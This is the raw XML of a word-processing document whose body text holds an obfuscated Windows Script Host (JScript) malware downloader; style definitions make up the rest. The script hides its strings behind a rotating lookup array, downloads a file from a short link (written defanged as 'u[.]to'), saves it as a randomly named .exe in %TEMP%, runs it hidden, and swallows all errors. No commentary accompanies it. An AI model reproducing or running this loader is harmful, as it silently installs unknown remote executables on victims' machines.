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widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">var _0x22fa1f = _0x2ad0;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(function(_0x4f7733, _0x9ac3d3) {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var _0x364b15 = _0x2ad0,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_0x54d738 = _0x4f7733();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while (!![]) {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try {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    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">var _0x3db72c = parseInt(_0x364b15(0x1ef)) / 0x1 * (parseInt(_0x364b15(0x1e5)) / 0x2) + parseInt(_0x364b15(0x1f3)) / 0x3 * (parseInt(_0x364b15(0x1f9)) / 0x4) + -parseInt(_0x364b15(0x1f0)) / 0x5 * (parseInt(_0x364b15(0x1f4)) / 0x6) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+ parseInt(_0x364b15(0x1f6)) / 0x7 * (-parseInt(_0x364b15(0x1e9)) / 0x8) + -parseInt(_0x364b15(0x1f7)) / 0x9 * (-parseInt(_0x364b15(0x1ed)) / 0xa) + -parseInt(_0x364b15(0x203)) / 0xb + -parseInt(_0x364b15(0x1e8)) / 0xc * (parseInt(_0x364b15(0x200)) / 0xd);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    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">if (_0x3db72c === _0x9ac3d3) break;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    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">else _0x54d738['push'](_0x54d738['shift']());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} catch (_0x31c89a) {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    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">_0x54d738['push'](_0x54d738['shift']());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}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}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}(_0x131b, 0x7bbe1));</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr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function _0x131b() {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var _0x44cf17 = ['161388RPSeXo', '%TEMP%', '.exe', '492TCvoTF', '10472DzuRbO', 'MSXML2.XMLHTTP', 'Scripting.FileSystemObject', 'open', '2591450LelUFW', 'Open', '11DdyEIT', '143705KPLLVg', 'P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">osition', 'CreateObject', '811974EpasyL', '12YWhdLu', 'ExpandEnvironmentStrings', '161niwgeO', '9momQLi', 'send', '4jtkQWe', 'WScript.Shell', 'substring', 'Close', 'random', 'Write', 'ResponseBody', '70239FHGPwr', 'status', 'Type', '6616236zGcHfF', 'Run'];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_0x131b = function() {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return _0x44cf17;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};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return _0x131b();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}</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr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function _0x2ad0(_0x2cd2a4, _0x105e15) {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var _0x131be9 = _0x131b();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return _0x2ad0 = function(_0x2ad0ec, _0x3f4979) {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_0x2ad0ec = _0x2ad0ec - 0x1e5;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var _0x5d8691 = _0x131be9[_0x2ad0ec];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return _0x5d8691;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}, _0x2ad0(_0x2cd2a4, _0x105e15);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}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try {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var shell = WScript['CreateObject'](_0x22fa1f(0x1fa)),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fso = WScript[_0x22fa1f(0x1f2)](_0x22fa1f(0x1eb)),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tempFolder = shell[_0x22fa1f(0x1f5)](_0x22fa1f(0x1e6)),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randomName = Math[_0x22fa1f(0x1fd)]()['toString'](0x24)[_0x22fa1f(0x1fb)](0x2, 0xa) + _0x22fa1f(0x1e7),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filePath = tempFolder + '\x5c' + randomName,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fileUrl = 'https://u[.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">]to//6AgGIg',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xhr = WScript[_0x22fa1f(0x1f2)](_0x22fa1f(0x1ea));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xhr[_0x22fa1f(0x1ec)]('GET', fileUrl, ![]), xhr[_0x22fa1f(0x1f8)]();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if (xhr[_0x22fa1f(0x201)] === 0xc8) {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var stream = WScript[_0x22fa1f(0x1f2)]('ADODB.Stream');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 xml:space="preserve">    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">stream[_0x22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fa1f(0x1ee)](), stream[_0x22fa1f(0x202)] = 0x1, stream[_0x22fa1f(0x1fe)](xhr[_0x22fa1f(0x1ff)]), stream[_0x22fa1f(0x1f1)] = 0x0, stream['SaveToFile'](filePath, 0x2), stream[_0x22fa1f(0x1fc)](), shell[_0x22fa1f(0x204)]('\x22' + filePath + '\x22', 0x0, ![]);</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">} catch (_0x5584ac) {}</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:sectPr>
      <w:footnotePr/>
      <w:endnotePr/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:h="15840" w:orient="portrait" w:w="12240"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="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40502050405020303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">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="10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1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1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1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4">
    <w:name w:val="Heading 7"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665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665"/>
    <w:next w:val="665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665"/>
    <w:next w:val="665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7" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="148" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="149">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="147"/>
    <w:link w:val="6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147"/>
    <w:link w:val="6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147"/>
    <w:link w:val="6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147"/>
    <w:link w:val="67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147"/>
    <w:link w:val="6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147"/>
    <w:link w:val="67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147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147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14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9">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="147"/>
    <w:link w:val="67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1">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="147"/>
    <w:link w:val="6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665"/>
    <w:next w:val="665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147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4">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="665"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind w:left="720"/>
      <w:contextualSpacing w:val="true"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="165">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="1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665"/>
    <w:next w:val="665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147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1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9">
    <w:name w:val="No Spacing"/>
    <w:basedOn w:val="665"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="170">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="1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147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147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1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1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65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147"/>
    <w:link w:val="175"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="177">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="665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147"/>
    <w:link w:val="177"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="179">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="66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665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147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665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147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14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1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65"/>
    <w:next w:val="665"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="189">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="190">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="191">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="660"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="192">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="880"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="193">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="194">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1320"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="195">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1540"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="196">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665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665"/>
    <w:next w:val="665"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:afterAutospacing="0"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="665" w:default="1">
    <w:name w:val="Normal"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="666">
    <w:name w:val="Table Normal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67">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pageBreakBefore w:val="false"/>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="480"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="668">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pageBreakBefore w:val="false"/>
      <w:pBdr/>
      <w:spacing w:after="80" w:before="360"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="669">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pageBreakBefore w:val="false"/>
      <w:pBdr/>
      <w:spacing w:after="80" w:before="280"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="670">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pageBreakBefore w:val="false"/>
      <w:pBdr/>
      <w:spacing w:after="40" w:before="240"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="671">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pageBreakBefore w:val="false"/>
      <w:pBdr/>
      <w:spacing w:after="40" w:before="220"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="672">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pageBreakBefore w:val="false"/>
      <w:pBdr/>
      <w:spacing w:after="40" w:before="200"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="673">
    <w:name w:val="Title"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pageBreakBefore w:val="false"/>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="480"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="72"/>
      <w:szCs w:val="72"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="674">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="665"/>
    <w:next w:val="665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ONLYOFFICE/8.2.2.22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